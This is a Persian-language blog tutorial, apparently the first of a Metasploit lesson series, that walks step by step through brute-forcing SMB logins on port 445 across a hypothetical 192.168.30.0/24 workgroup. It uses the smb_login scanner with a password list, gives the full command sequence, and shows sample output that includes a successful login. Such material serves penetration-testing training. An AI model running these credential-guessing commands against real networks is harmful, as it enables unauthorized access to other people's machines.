سلام دوستان . همان طور که از عنوان پیداست قصد شروع آموزش های مرحله به مرحله ی متااسپلویت را داریم . لازم به ذکر است که این آموزش ها برای افرادی است که آشنایی متوسطی از کار با این framework را دارند . هم چنین در هر پست یک سناریو مورد بررسی قرار می گیرد . سعی شده تمامی آموزش های گرد آوردی شده از این منبع باشد تا دسته بندی منظم تری داشته باشد . ضمن این که بعضی از مطالب از طرف نویسنده و منابع دیگر نوشته شده است . لازم به ذکر است که تا الان 17 سری از آموزش ها تهیه و تا 10 مرداد زمان بندی شده است . طبق زمان بندی ای که بر روی آموزش ها انجام گرفته , از امروز هر شنبه یک پست از این سری منتشر خواهد شد .
اما سناریو ای که امروز در مورد آن صحبت می کنیم اسکن کردن تعدادی یوزر و پسورد بر روی پورت 445 کلاینت های یک شبکه می باشد .
توپولوژی فرضی شبکه :
ابتدا اسکنر زیر را در کنسول متااسپلویت انتخاب می کنیم :
msf > use auxiliary/scanner/smb/smb_login
برای مشاهده ی امکانتی که در پیش داریم دستور زیر را اجرا می کنیم :
msf auxiliary(smb_login) > show options
توجه داشته باشید مواردی که مقدار آن ها در زیر ستون Required برابر yes است حتما باید لحاظ شوند .
ابتدا فایل پسورد لیستی که قرار است روی تمامی کلاینت ها بررسی شود را انتخاب می کنیم :
msf auxiliary(smb_login) > set PASS_FILE /root/PasswordList/Passlist.0001.txt
حال username ای که قرار است در تمامی کلاینت ها بررسی شود را انتخاب می کنیم :
msf auxiliary(smb_login) > set SMBUser OSLearn
فرض بر آن شده است که تعدادی کلاینت در یک شبکه ی Workgroup با نام OSGroup وجود دارد . پس :
msf auxiliary(smb_login) > set SMBDomain OSGroup
برای افزایش سرعت پویش , THREADS را بر روی 50 انتخاب می کنیم :
msf auxiliary(smb_login) > set THREADS 50
فرض شده است که آدرس شبکه 192.168.30.0/24 کی باشد . پس برای تست پسورد لیست بر روی کلیه ی کلاینت ها به شکل زیر عمل می کنیم :
msf auxiliary(smb_login) > set RHOSTS 192.168.30.0/24
در نهایت برای اجرای پویش به صورت زیر عمل می کنیم :
msf auxiliary(smb_login) > run [*] 192.168.30.10 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.30.20 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.30.30 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.30.40 - FAILED 0xc000006d - STATUS_LOGON_FAILURE [*] 192.168.30.50 - SUCCESSFUL LOGIN (Windows) [*] Auxiliary module execution completed
نکته : پورت پیش فرض SMB 445 می باشد اما برای تغییر آن به صورت زیر عمل می کنیم :
msf auxiliary(smb_login) > set RPORT [PORT]
موفق و موید باشید
منبع : او اس لرن دات آی آر | http://OSLearn.ir
نویسنده : E2MA3N